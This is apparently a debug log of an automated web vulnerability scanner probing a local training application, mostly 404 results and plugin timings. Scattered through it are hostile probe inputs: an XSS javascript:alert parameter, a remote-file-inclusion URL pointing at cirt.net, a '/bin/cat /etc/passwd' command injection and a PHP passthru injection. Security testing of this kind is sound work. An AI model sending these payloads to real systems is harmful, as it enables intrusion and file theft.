http://localhost:9090/phpimageview.php?pic=javascript:alert(8754) returned HTTP code "404" (id=23249,from_cache=0,grep=1,rtt=0.14,did=N0195tx8) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/mini_logger.cgi returned HTTP code "404" (id=23246,from_cache=0,grep=1,rtt=0.14,did=iM2akN5p) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2170. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/photo_album/apa_phpinclude.inc.php?apa_module_basedir=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=23261,from_cache=0,grep=1,rtt=0.07,did=V9kTpTip) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/modules/Submit/index.php?op=pre&title== returned HTTP code "404" (id=23245,from_cache=0,grep=1,rtt=0.15,did=BB3PRStg) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/\n\n.jsp returned HTTP code "404" (id=23262,from_cache=0,grep=1,rtt=0.16,did=By6cTAAD) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4473. [Wed Feb 12 10:04:29 2020 - debug] localhost:9090 connection pool stats (free:131 / in_use:4 / max:50 / total:135) [Wed Feb 12 10:04:29 2020 - debug] Connections with more in use time: (90be6af6aef4850b, 0.11 sec) (74a9255876c11eb3, 0.08 sec) (5c670c649c5cf5f5, 0.07 sec) (c6cbea9c6f898d58, 0.06 sec) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~bin returned HTTP code "404" (id=23263,from_cache=0,grep=1,rtt=0.05,did=oI0x6v2W) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/28/exec/show returned HTTP code "404" (id=23265,from_cache=0,grep=1,rtt=0.06,did=R1xcz6yn) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/admin/login.php?action=insert&username=test&password=test returned HTTP code "404" (id=23266,from_cache=0,grep=1,rtt=0.09,did=mGoS9IV3) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/wwwwais returned HTTP code "404" (id=23267,from_cache=0,grep=1,rtt=0.11,did=fo5XMQVr) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2171. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/rwwwshell.pl returned HTTP code "404" (id=23264,from_cache=0,grep=1,rtt=0.08,did=x6jCWQlz) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4473. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2172. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/diagnose.cgi returned HTTP code "404" (id=23201,from_cache=0,grep=1,rtt=0.15,did=VEiN3zMq) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/node/view/666\\"> returned HTTP code "404" (id=23268,from_cache=0,grep=1,rtt=0.08,did=CFjxTYkU) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/_vti_pvt/botinfs.cnf returned HTTP code "404" (id=23269,from_cache=0,grep=1,rtt=0.15,did=9sNdEPDC) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4473. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2173. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4474. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/blog/mt-check.cgi returned HTTP code "404" (id=23270,from_cache=0,grep=1,rtt=0.23,did=jfzpbwAC) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2174. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4475. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/logins.html returned HTTP code "404" (id=23271,from_cache=0,grep=1,rtt=0.07,did=WlDd0ORl) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/html/chatheader.php?mainfile=anything&Default_Theme=\'= returned HTTP code "404" (id=23272,from_cache=0,grep=1,rtt=0.02,did=2ZpznyTG) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4476. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2175. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/orders/order_log_v12.dat returned HTTP code "404" (id=23274,from_cache=0,grep=1,rtt=0.12,did=1diCLiGO) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/mailnews.cgi returned HTTP code "404" (id=23276,from_cache=0,grep=1,rtt=0.22,did=iYrPqcaY) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/48/exec/show returned HTTP code "404" (id=23273,from_cache=0,grep=1,rtt=0.12,did=CjJaiZ4a) [Wed Feb 12 10:04:29 2020 - debug] symfony.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] motw.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] meta_generator.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] retirejs.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:29 2020 - debug] serialized_object.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] private_ip.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] blank_body.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4477. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2176. [Wed Feb 12 10:04:29 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 10:04:29 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: koIsNiG8) [Wed Feb 12 10:04:29 2020 - debug] svn_users.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/article.cfm?id=1\'= returned HTTP code "404" (id=23275,from_cache=0,grep=1,rtt=0.09,did=q7Qjuj4T) [Wed Feb 12 10:04:29 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] credit_cards.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] websockets_links.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] csp.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] dom_xss.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] vulners_db.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] expect_ct.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4478. [Wed Feb 12 10:04:29 2020 - debug] file_upload.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] keys.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4479. [Wed Feb 12 10:04:29 2020 - debug] clamav.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] objects.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] error_500.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] meta_tags.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] password_profiling.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] click_jacking.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] lang.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_reason.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] cache_control.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_headers.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] ssn.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] oracle.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] feeds.grep(uri="http://localhost:9090/art/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4480. [Wed Feb 12 10:04:29 2020 - debug] url_session.grep(uri="http://localhost:9090/art/") took 0.02s to run [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/.jsp returned HTTP code "404" (id=23277,from_cache=0,grep=1,rtt=0.10,did=tQ7mz3Pm) [Wed Feb 12 10:04:29 2020 - debug] error_pages.grep(uri="http://localhost:9090/art/") took 0.04s to run [Wed Feb 12 10:04:29 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/art/") took 0.04s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4481. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat /etc/passwd| returned HTTP code "404" (id=23279,from_cache=0,grep=1,rtt=0.06,did=lcA04Qdy) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/MsmMask.exe?mask=/junk334 returned HTTP code "404" (id=23280,from_cache=0,grep=1,rtt=0.12,did=QOltIQxf) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/mt-static/ returned HTTP code "404" (id=23278,from_cache=0,grep=1,rtt=0.08,did=MpH16ejA) [Wed Feb 12 10:04:29 2020 - debug] localhost:9090 connection pool stats (free:137 / in_use:1 / max:50 / total:138) [Wed Feb 12 10:04:29 2020 - debug] Connections with more in use time: (0ea240d1abe07813, 0.01 sec) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/admin/cplogfile.log returned HTTP code "404" (id=23283,from_cache=0,grep=1,rtt=0.15,did=6mit4bAa) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/19/exec/show returned HTTP code "404" (id=23286,from_cache=0,grep=1,rtt=0.09,did=35JvoFnC) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/servlet/SessionManager returned HTTP code "404" (id=23284,from_cache=0,grep=1,rtt=0.12,did=VX2PFwMQ) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/58/exec/show returned HTTP code "404" (id=23282,from_cache=0,grep=1,rtt=0.02,did=qoka4ETE) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/servlet/admin?category=server&method=listAll&Authorization=Digest username="admin", response="ae9f86d6beaa3f9ecb9a5b7e072a4138", nonce="2b089ba7985a883ab2eddcd3539a6c94", realm="adminRealm", uri="/servlet/admin" returned HTTP code "404" (id=23281,from_cache=0,grep=1,rtt=0.04,did=fWrxbV2J) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/16/exec/ returned HTTP code "404" (id=23289,from_cache=0,grep=1,rtt=0.02,did=U7Z6Q9DV) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~root returned HTTP code "404" (id=23291,from_cache=0,grep=1,rtt=0.05,did=qQn44zSp) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/_vti_pvt/services.org returned HTTP code "404" (id=23292,from_cache=0,grep=1,rtt=0.12,did=WlKuYt5U) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/jigsaw/ returned HTTP code "404" (id=23294,from_cache=0,grep=1,rtt=0.05,did=HjfSkuSC) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4482. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/dcshop/auth_data/auth_user_file.txt returned HTTP code "404" (id=23290,from_cache=0,grep=1,rtt=0.11,did=0e7Bbuyb) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/67/exec/show returned HTTP code "404" (id=23288,from_cache=0,grep=1,rtt=0.06,did=LQbkpXpi) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/fcgi-bin/echo.exe?foo= returned HTTP code "404" (id=23285,from_cache=0,grep=1,rtt=0.02,did=3ralYtRQ) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2177. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/38/exec/show returned HTTP code "404" (id=23287,from_cache=0,grep=1,rtt=0.04,did=DwI15aX6) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/config/ returned HTTP code "404" (id=23293,from_cache=0,grep=1,rtt=0.09,did=N86My1cr) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4483. [Wed Feb 12 10:04:29 2020 - debug] eval.audit(did="6uDDG4sg",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 7.98s to run [Wed Feb 12 10:04:29 2020 - debug] global_redirect.audit(did="TPayqwMD", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:29 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:TPayqwMD) [Wed Feb 12 10:04:29 2020 - debug] format_string.audit(did="0D3LQGQX",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 2.39s to run [Wed Feb 12 10:04:29 2020 - debug] xpath.audit(did="i7pO6shN", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:29 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:i7pO6shN) [Wed Feb 12 10:04:29 2020 - debug] os_commanding.audit(did="ECQcWxwo",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 7.04s to run [Wed Feb 12 10:04:29 2020 - debug] cors_origin.audit(did="ep7jMrb7", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] memcachei.audit(did="mj2ARJh1",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 2.38s to run [Wed Feb 12 10:04:29 2020 - debug] htaccess_methods.audit(did="aPIhTTKL", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] blind_sqli.audit(did="IZoOFIG4",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 6.95s to run [Wed Feb 12 10:04:29 2020 - debug] dav.audit(did="KxpE8JFL", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] dav.audit(did="KxpE8JFL",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] ssi.audit(did="CLJfQnkl", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] ldapi.audit(did="kt4vBVaT",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 2.40s to run [Wed Feb 12 10:04:29 2020 - debug] xxe.audit(did="OrkSvAK4", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cd-cgi/sscd_suncourier.pl returned HTTP code "404" (id=23295,from_cache=0,grep=1,rtt=0.13,did=G6RkCS39) [Wed Feb 12 10:04:29 2020 - debug] buffer_overflow.audit(did="WhzHihNJ",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 2.41s to run [Wed Feb 12 10:04:29 2020 - debug] eval.audit(did="xeIAf2q7", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:29 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:xeIAf2q7) [Wed Feb 12 10:04:29 2020 - debug] redos.audit(did="6EttuRTu",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 2.29s to run [Wed Feb 12 10:04:29 2020 - debug] rosetta_flash.audit(did="wls3rsd1", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] rosetta_flash.audit(did="wls3rsd1",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] xss.audit(did="r6oQgE4o", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:29 2020 - debug] xss.audit(did="r6oQgE4o",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] xst.audit(did="C1AU7sly", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4484. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4485. [Wed Feb 12 10:04:29 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:29 2020 - debug] localhost:9090 connection pool stats (free:139 / in_use:1 / max:50 / total:140) [Wed Feb 12 10:04:29 2020 - debug] Connections with more in use time: (74290a68deaae420, 0.22 sec) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi returned HTTP code "404" (id=23297,from_cache=0,grep=1,rtt=0.09,did=KElHf7NH) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/instantwebmail/message.php returned HTTP code "404" (id=23299,from_cache=0,grep=1,rtt=0.09,did=sIdXNCFW) [Wed Feb 12 10:04:29 2020 - debug] xst.audit(did="C1AU7sly",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.10s to run [Wed Feb 12 10:04:29 2020 - debug] ssl_certificate.audit(did="mD6D9OiH", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] ssl_certificate.audit(did="mD6D9OiH",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] preg_replace.audit(did="1231GeuJ", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:29 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:29 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:1231GeuJ) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/start.cgi/ returned HTTP code "404" (id=23300,from_cache=0,grep=1,rtt=0.03,did=RGsoo0aH) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/77/exec/show returned HTTP code "404" (id=23301,from_cache=0,grep=1,rtt=0.09,did=2cF86aEB) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/phpclassifieds/latestwap.php?url== returned HTTP code "404" (id=23298,from_cache=0,grep=1,rtt=0.09,did=80UxkkXp) [Wed Feb 12 10:04:29 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11966, 'reject-seen-url': 5603, 'reject-out-of-scope': 216, 'accept': 4890} [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/mt/ returned HTTP code "404" (id=23303,from_cache=0,grep=1,rtt=0.08,did=XSqcPaKU) [Wed Feb 12 10:04:29 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11966, 'reject-seen-url': 5603, 'reject-out-of-scope': 216, 'accept': 4890} [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/49/exec/show returned HTTP code "404" (id=23306,from_cache=0,grep=1,rtt=0.12,did=v5AlUnlB) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/29/exec/show returned HTTP code "404" (id=23308,from_cache=0,grep=1,rtt=0.06,did=HGRkk9LW) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/MsmMask.exe?mask=/junk334 returned HTTP code "404" (id=23309,from_cache=0,grep=1,rtt=0.25,did=GFFpfElh) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4486. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~daemon returned HTTP code "404" (id=23305,from_cache=0,grep=1,rtt=0.15,did=amkvBlpK) [Wed Feb 12 10:04:29 2020 - debug] Increased the worker pool size to 49 (error rate: 0%) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/apps/web/vs_diag.cgi?server= returned HTTP code "404" (id=23310,from_cache=0,grep=1,rtt=0.12,did=Qp0cEzkT) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/BACLIENT returned HTTP code "404" (id=23312,from_cache=0,grep=1,rtt=0.08,did=srZ27hd3) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/photo/manage.cgi returned HTTP code "404" (id=23296,from_cache=0,grep=1,rtt=0.14,did=gHB5ZQlk) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/Count.cgi returned HTTP code "404" (id=23307,from_cache=0,grep=1,rtt=0.10,did=1d7F7gqh) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/mmstdod.cgi returned HTTP code "404" (id=23304,from_cache=0,grep=1,rtt=0.21,did=kIvLh0Ya) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2178. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/87/exec/show returned HTTP code "404" (id=23302,from_cache=0,grep=1,rtt=0.14,did=UOrmqyNM) [Wed Feb 12 10:04:29 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" () [Wed Feb 12 10:04:29 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:CLJfQnkl) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4487. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2179. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4488. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/97/exec/show returned HTTP code "404" (id=23315,from_cache=0,grep=1,rtt=0.04,did=Xh91qWow) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/modules/viewtopic.php?t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23317,from_cache=0,grep=1,rtt=0.10,did=C35EvhPV) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=23311,from_cache=0,grep=0,rtt=0.06,did=koIsNiG8) [Wed Feb 12 10:04:29 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: koIsNiG8) [Wed Feb 12 10:04:29 2020 - debug] detailed._login() took 0.82s to run [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/Orders/order_log_v12.dat returned HTTP code "404" (id=23313,from_cache=0,grep=1,rtt=0.08,did=YUUx5X6l) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/ibill.pm returned HTTP code "404" (id=23314,from_cache=0,grep=1,rtt=0.23,did=RZwo0hNU) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2180. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/settings/site.ini returned HTTP code "404" (id=23318,from_cache=0,grep=1,rtt=0.14,did=SYHjkPlt) [Wed Feb 12 10:04:29 2020 - debug] GET 